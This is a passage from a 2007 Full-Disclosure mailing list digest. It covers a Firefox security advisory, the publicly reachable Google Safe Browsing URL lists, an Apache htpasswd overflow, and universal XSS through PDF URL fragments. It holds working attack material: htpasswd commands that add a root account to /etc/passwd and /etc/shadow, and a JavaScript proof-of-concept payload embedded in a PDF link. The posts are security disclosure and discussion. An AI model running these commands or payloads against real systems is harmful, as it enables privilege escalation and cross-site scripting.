> CVE-2006-6502, CVE-2006-6503, CVE-2006-6504, CVE-2006-6506, > CVE-2006-6507 > =========================================================== > > A security issue affects the following Ubuntu releases: > > Ubuntu 6.10 > > This advisory also applies to the corresponding versions of > Kubuntu, Edubuntu, and Xubuntu. > > The problem can be corrected by upgrading your system to the > following package versions: > > Ubuntu 6.10: > firefox 2.0.0.1+0dfsg-0ubuntu0.6.10 > firefox-dev 2.0.0.1+0dfsg-0ubuntu0.6.10 > libnspr-dev 2.0.0.1+0dfsg-0ubuntu0.6.10 > libnspr4 2.0.0.1+0dfsg-0ubuntu0.6.10 > libnss-dev 2.0.0.1+0dfsg-0ubuntu0.6.10 > libnss3 2.0.0.1+0dfsg-0ubuntu0.6.10 > > After a standard system upgrade you need to restart Firefox to effect > the necessary changes. > > Details follow: > > Various flaws have been reported that allow an attacker to execute > arbitrary code with user privileges by tricking the user into opening > a malicious web page containing JavaScript or SVG. (CVE-2006-6497, > CVE-2006-6498, CVE-2006-6499, CVE-2006-6501, CVE-2006-6502, > CVE-2006-6504) > > Various flaws have been reported that allow an attacker to bypass > Firefox's internal XSS protections by tricking the user into opening a > malicious web page containing JavaScript. (CVE-2006-6503, > CVE-2006-6507) > > Jared Breland discovered that the "Feed Preview" feature could leak > referrer information to remote servers. (CVE-2006-6506) We're getting better. This one only took 9 days... http://www.mozilla.com/en-US/firefox/2.0.0.1/releasenotes/ -- -- Scott http://angrykeyboarder.com ? 2007 angrykeyboarder? & Elmer Fudd. All Wights Wesewved From info at beskerming.com Wed Jan 3 06:35:11 2007 From: info at beskerming.com (=?ISO-8859-1?Q?S=FBnnet_Beskerming?=) Date: Wed, 3 Jan 2007 17:05:11 +1030 Subject: [Full-disclosure] Google's blacklisted url database (phishing url database) Message-ID: Hi List, "How exactly does such data get captured? Somebody placed a link somewhere with the url having the user/password in it?" A bit of digging turns up the Google Gadget that these little MySpace gems are coming from (http://www.google.com/ig/directory?url=http:// web.ebuell.com/myspace.xml). Why the developer chose to pass / accept authentication details in the URL without warning the end user is beyond me. Perhaps it is related to his claims that it can be used as a proxy to access MySpace when the main site is being blocked by filters. Unfortunately for Google, the URLs listed clearly identify that the mistake is a result of Google indexing the Google Gadgets that people have placed on their sites / Google homepages. It is interesting to see the quality of the passwords on this list of presumably live accounts, though I do think that some of the users are a little insecure about more than just their passwords... Even though searching for various elements of the listed URLs across a number of the major search engines doesn't turn up anything of interest, the author claims that it has been used almost 3.5 million times from Google (distinct users would be less, but it would make for interesting sniffing). Carl S?nnet Beskerming Pty. Ltd. Adelaide, Australia http://www.beskerming.com From monikerd at gmail.com Wed Jan 3 03:21:11 2007 From: monikerd at gmail.com (moniker monikerd) Date: Wed, 3 Jan 2007 04:21:11 +0100 Subject: [Full-disclosure] Google's blacklisted url database (phishing url database) In-Reply-To: <447d701a0701021919n33efb7fai18eac103841a0f69@mail.gmail.com> References: <200701022317.08793.phoenix.diablo@gmail.com> <001c01c72ec0$2e510a50$650ba8c0@DORKA> <447d701a0701021919n33efb7fai18eac103841a0f69@mail.gmail.com> Message-ID: <447d701a0701021921p66065f5bp834cbb0b084f391d@mail.gmail.com> i see only two possible ways for google to get this kind of data. google toolbar or it buys/gets this information from some isp/companies/anybody with a big enough pipe .. On 1/2/07, php0t wrote: > > > > > > How exactly does such data get captured? Somebody placed a link > > somewhere with the url having the user/password in it ? What would be > > the point of that? And if not, where did that come from? I peeked at > > http://www.google.com/tools/firefox/safebrowsing/faq.html to learn more > > but it only has obvious info. > > > > > > > > -----Original Message----- > > From: full-disclosure-bounces at lists.grok.org.uk > > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of JM > > Sent: Tuesday, January 02, 2007 11:17 PM > > To: full-disclosure at lists.grok.org.uk > > Subject: Re: [Full-disclosure]Google's blacklisted url database > > (phishing url database) > > > > > > > > I just played around a bit with those lists and as it seems, Google did > > a splendid job, even capturing some people's login data. Like here: > > http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7753 > > > > Regards, > > J.M. > > Professional Lurker > > > > >[By] "Rajesh Sethumadhavan" > > >[Date] Dienstag, 2. Januar 2007 18:42 > > >[To] full-disclosure at lists.grok.org.uk > > >[Subject] [Full-disclosure] Google's blacklisted url database (phishing > > url > > >database) > > > > > > It is possible to access google`s blacklisted url database ( phishing > > > url database ) > > > > > > http://sb.google.com/safebrowsing/update?version=goog-black-url:1:1 > > > http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7998 > > > > > >http://sb.google.com/safebrowsing/update?version=goog-white-domain:1:19 > > ,goo > > >g-white-url:1:371,goog-black-url:1:7693,goog-black-enchash:1:15282 > > > > > > > > > This database (Part of Google Safe Browsing) can be used in any > > > anti-phishing commercial softwares :) > > > > > > Regards > > > Rajesh Sethumadhavan > > > http://www.xdisclose.com > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070103/c77a6d27/attachment.html From rajesh.sethumadhavan at yahoo.com Wed Jan 3 09:24:04 2007 From: rajesh.sethumadhavan at yahoo.com (Rajesh Sethumadhavan) Date: Wed, 3 Jan 2007 01:24:04 -0800 (PST) Subject: [Full-disclosure] Google's blacklisted url database (phishing url database) In-Reply-To: <447d701a0701021921p66065f5bp834cbb0b084f391d@mail.gmail.com> Message-ID: <447682.93039.qm@web37215.mail.mud.yahoo.com> http://sb.google.com/safebrowsing/update?versio=goog-black-url:1:0000 version info for each file: --------------------------------------------------- [goog-black-enchash 1.15525] [goog-black-url 1.7755] [goog-sandbox-text 1.5] [goog-white-domain 1.19] [goog-white-url 1.371] ----------------------------------------------------- interpolating "goog-sandbox-text" gives this URL: http://sb.google.com/safebrowsing/update?version=goog-sandbox-text:1:7753 which sends: ------------------------------------------------ [goog-sandbox-text 1.5] +sandbox function%20getHandlers%28%29%7Breturn%5B%5D%7D%0A%3B%0A%0A ------------------------------------------------ Oooh look, a hard-coded hash function. Paydirt ;) http://sb.google.com/safebrowsing/update?version=goog-white-domain:1:7753 This one's presumably the white-listed domains: moniker monikerd wrote: i see only two possible ways for google to get this kind of data. google toolbar or it buys/gets this information from some isp/companies/anybody with a big enough pipe .. On 1/2/07, php0t wrote: How exactly does such data get captured? Somebody placed a link somewhere with the url having the user/password in it ? What would be the point of that? And if not, where did that come from? I peeked at http://www.google.com/tools/firefox/safebrowsing/faq.html to learn more but it only has obvious info. -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of JM Sent: Tuesday, January 02, 2007 11:17 PM To: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure]Google's blacklisted url database (phishing url database) I just played around a bit with those lists and as it seems, Google did a splendid job, even capturing some people's login data. Like here: http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7753 Regards, J.M. Professional Lurker >[By] "Rajesh Sethumadhavan" < rajesh.sethumadhavan at yahoo.com> >[Date] Dienstag, 2. Januar 2007 18:42 >[To] full-disclosure at lists.grok.org.uk >[Subject] [Full-disclosure] Google's blacklisted url database (phishing url >database) > > It is possible to access google`s blacklisted url database ( phishing > url database ) > > http://sb.google.com/safebrowsing/update?version=goog-black-url:1:1 > http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7998 > > http://sb.google.com/safebrowsing/update?version=goog-white-domain:1:19 ,goo >g-white-url:1:371,goog-black-url:1:7693,goog-black-enchash:1:15282 > > > This database (Part of Google Safe Browsing) can be used in any > anti-phishing commercial softwares :) > > Regards > Rajesh Sethumadhavan > http://www.xdisclose.com __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070103/38ff536c/attachment.html From andfarm at gmail.com Tue Jan 2 23:45:45 2007 From: andfarm at gmail.com (Andrew Farmer) Date: Tue, 2 Jan 2007 15:45:45 -0800 Subject: [Full-disclosure] Apache 1.3.37 htpasswd buffer overflow vulnerability In-Reply-To: <47c0571c0701021220r6ad0169l4d0f9d70ffdd7653@mail.gmail.com> References: <47c0571c0701021220r6ad0169l4d0f9d70ffdd7653@mail.gmail.com> Message-ID: On 02 Jan 07, at 12:20, Matias Soler wrote: > Synopsis: Apache 1.3.37 htpasswd buffer overflow vulnerability > Version: 1.3.37 (latest 1.3.xx) > > Product > ======= > Apache htpasswd utility > > Issue > ===== > A buffer overflow vilnerability has been found, it is dangerous > only on > environment where the binary is suid root. If htpasswd is setuid, then one could just as easily: htpasswd -bp /etc/passwd toor x:0:0:toor::/:/bin/sh htpasswd -bp /etc/shadow toor xxa8fjDF6WqBA:0:0:99999:7::: and get root. (Or any number of things - sudoers, crontab, SSH keys - take your pick.) It's possible that this buffer overflow may be significant in very limited circumstances - if the utility is executed from a web application, perhaps. However, this seems like a rather limited-scope issue. -- Andrew Farmer From stan.bubrouski at gmail.com Wed Jan 3 07:58:40 2007 From: stan.bubrouski at gmail.com (Stan Bubrouski) Date: Wed, 3 Jan 2007 02:58:40 -0500 Subject: [Full-disclosure] Google's blacklisted url database (phishing url database) In-Reply-To: <447d701a0701021921p66065f5bp834cbb0b084f391d@mail.gmail.com> References: <200701022317.08793.phoenix.diablo@gmail.com> <001c01c72ec0$2e510a50$650ba8c0@DORKA> <447d701a0701021919n33efb7fai18eac103841a0f69@mail.gmail.com> <447d701a0701021921p66065f5bp834cbb0b084f391d@mail.gmail.com> Message-ID: <122827b90701022358n660125d2if991b8f5459bc1e0@mail.gmail.com> You're forgetting that gmail has a feature to report phishing messages, that alone could give google quite a list of phishing sites given its userbase. -sb On 1/2/07, moniker monikerd wrote: > > i see only two possible ways for google to get this kind of data. > > google toolbar > or it buys/gets this information from some isp/companies/anybody with a big > enough pipe .. > > > > > > > > > > > On 1/2/07, php0t wrote: > > > > > > How exactly does such data get captured? Somebody placed a link > > > somewhere with the url having the user/password in it ? What would be > > > the point of that? And if not, where did that come from? I peeked at > > > > http://www.google.com/tools/firefox/safebrowsing/faq.html > to learn more > > > but it only has obvious info. > > > > > > > > > > > > -----Original Message----- > > > From: full-disclosure-bounces at lists.grok.org.uk > > > [mailto:full-disclosure-bounces at lists.grok.org.uk] On > Behalf Of JM > > > Sent: Tuesday, January 02, 2007 11:17 PM > > > To: full-disclosure at lists.grok.org.uk > > > Subject: Re: [Full-disclosure]Google's blacklisted url database > > > (phishing url database) > > > > > > > > > > > > I just played around a bit with those lists and as it seems, Google did > > > a splendid job, even capturing some people's login data. Like here: > > > > http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7753 > > > > > > Regards, > > > J.M. > > > Professional Lurker > > > > > > >[By] "Rajesh Sethumadhavan" < rajesh.sethumadhavan at yahoo.com> > > > >[Date] Dienstag, 2. Januar 2007 18:42 > > > >[To] full-disclosure at lists.grok.org.uk > > > >[Subject] [Full-disclosure] Google's blacklisted url database (phishing > > > url > > > >database) > > > > > > > > It is possible to access google`s blacklisted url database ( phishing > > > > url database ) > > > > > > > > > http://sb.google.com/safebrowsing/update?version=goog-black-url:1:1 > > > > > http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7998 > > > > > > > > > http://sb.google.com/safebrowsing/update?version=goog-white-domain:1:19 > > > ,goo > > > > >g-white-url:1:371,goog-black-url:1:7693,goog-black-enchash:1:15282 > > > > > > > > > > > > This database (Part of Google Safe Browsing) can be used in any > > > > anti-phishing commercial softwares :) > > > > > > > > Regards > > > > Rajesh Sethumadhavan > > > > http://www.xdisclose.com > > > > > > _______________________________________________ > > > Full-Disclosure - We believe in it. > > > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > > > > > > > > > > _______________________________________________ > > > Full-Disclosure - We believe in it. > > > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > From pdp.gnucitizen at googlemail.com Wed Jan 3 02:20:01 2007 From: pdp.gnucitizen at googlemail.com (pdp (architect)) Date: Wed, 3 Jan 2007 02:20:01 +0000 Subject: [Full-disclosure] Universal XSS with PDF files: highly dangerous Message-ID: <6905b1570701021820v7b22961do7226be1bcf04fa57@mail.gmail.com> I will be very quick and just point to links where you can read about this issue. It seams that PDF documents can execute JavaScript code for no apparent reason by using the following template: http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here You must understand that the attacker doesn't need to have write access to the specified PDF document. In order to get an XSS vector working you need to have a PDF file hosted on the target and that's all about it. The rest is just a matter of your abilities and desires. This finding was originally mentioned by Sven Vetsch, on his blog. This is a very good and quite interesting. Good work. There is a POC I composed: http://www.google.com/librariancenter/downloads/Tips_Tricks_85x11.pdf#something=javascript:function%20createXMLHttpRequest(){%20%20%20try{%20return%20new%20ActiveXObject('Msxml2.XMLHTTP');%20}catch(e){}%20%20%20try{%20return%20new%20ActiveXObject('Microsoft.XMLHTTP');%20}catch(e){}%20%20%20try{%20return%20new%20XMLHttpRequest();%20}catch(e){}%20%20%20return%20null;}var%20xhr%20=%20createXMLHttpRequest();xhr.onreadystatechange%20=%20function(){%20%20%20%20if%20(xhr.readyState%20==%204)%20%20%20%20%20%20%20%20alert(xhr.responseText);};xhr.open('GET',%20'http://www.google.com',%20true);xhr.send(null); More on the matter can be found here: http://www.gnucitizen.org/blog/danger-danger-danger/ http://www.disenchant.ch/blog/hacking-with-browser-plugins/34 -- pdp (architect) | petko d. petkov http://www.gnucitizen.org From aksecurity at gmail.com Wed Jan 3 05:17:44 2007 From: aksecurity at gmail.com (Amit Klein) Date: Wed, 03 Jan 2007 07:17:44 +0200 Subject: [Full-disclosure] [WEB SECURITY] Universal XSS with PDF files: highly dangerous In-Reply-To: <6905b1570701021820v7b22961do7226be1bcf04fa57@mail.gmail.com> References: <6905b1570701021820v7b22961do7226be1bcf04fa57@mail.gmail.com> Message-ID: <459B3C78.2080007@gmail.com> pdp (architect) wrote: > I will be very quick and just point to links where you can read about > this issue. > > It seams that PDF documents can execute JavaScript code for no > apparent reason by using the following template: > > > http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here > > > You must understand that the attacker doesn't need to have write > access to the specified PDF document. In order to get an XSS vector > working you need to have a PDF file hosted on the target and that's > all about it. The rest is just a matter of your abilities and desires. > Amazing, and kudos to Sven Vetsch who found this. Note that from attack categorization perspective, it appears to be a twisted example of DOM based XSS (http://www.webappsec.org/projects/articles/071105.shtml). I suppose PDF retrieves the URL from the browser (probably from a degenerate DOM the browser provides it - after all, the document object is available to the payload JS code!), parses it and uses the fragment. Since fragments are used, the payload doesn't travel to the target web server (!). I mentioned the possible use of fragments as a particularly nasty attack vector (impossible to detect on server) in the "DOM based XSS" writeup. -Amit From sven.vetsch at disenchant.ch Wed Jan 3 08:37:00 2007 From: sven.vetsch at disenchant.ch (sven.vetsch at disenchant.ch) Date: Wed, 03 Jan 2007 09:37:00 +0100 Subject: [Full-disclosure] [WEB SECURITY] Universal XSS with PDF files: highly dangerous In-Reply-To: <6905b1570701021820v7b22961do7226be1bcf04fa57@mail.gmail.com> References: <6905b1570701021820v7b22961do7226be1bcf04fa57@mail.gmail.com> Message-ID: <1167813420.459b6b2c0a8d7@www.mail2web.ch> Quoting "pdp (architect)" : > This finding was originally mentioned by Sven Vetsch, on his blog. > This is a very good and quite interesting. Good work. Sorry about that but that's wrong. All the credits have to go to Stefano Di Paola and Giorgio Fedon. They presented that stuff at the 23C3 in Berlin. The only thing that I did was an overview and I found out, that it doesn't matter how the parameter is called. I "just" forgot to copy paste the credits from my original document, to the blog entry. I'm very sorry about that and of course I putted it in my entry now. Regards, Disenchant / Sven Vetsch From steve at localhost.lu Wed Jan 3 09:58:55 2007 From: steve at localhost.lu (Steve Clement) Date: Wed, 03 Jan 2007 10:58:55 +0100 Subject: [Full-disclosure] Google's blacklisted url database (phishing url database) In-Reply-To: <001c01c72ec0$2e510a50$650ba8c0@DORKA> References: <001c01c72ec0$2e510a50$650ba8c0@DORKA> Message-ID: <459B7E5F.4020202@localhost.lu> php0t wrote: > How exactly does such data get captured? Somebody placed a link > Well the poster of the password link would've done better explaining how goog mines the data instead of easily disclosing valid e-mail passwords. This shows yet again how crucial it is to use throw-away passwords that you can use for badly coded web sites that disclose passwords plain-text in the URL. It's not really Googles' fault if some people don't know how web-security basics work. They grab the web, crawl it hideously and find all of it, including sensitive data. As to whether the Blacklist should be public or not is up to personal believes. I for one think that it should be publicly available to have at least a good static reference of the most commonly used phishey sites... thanks for the fish and Goodbye! Steve > somewhere with the url having the user/password in it ? What would be > the point of th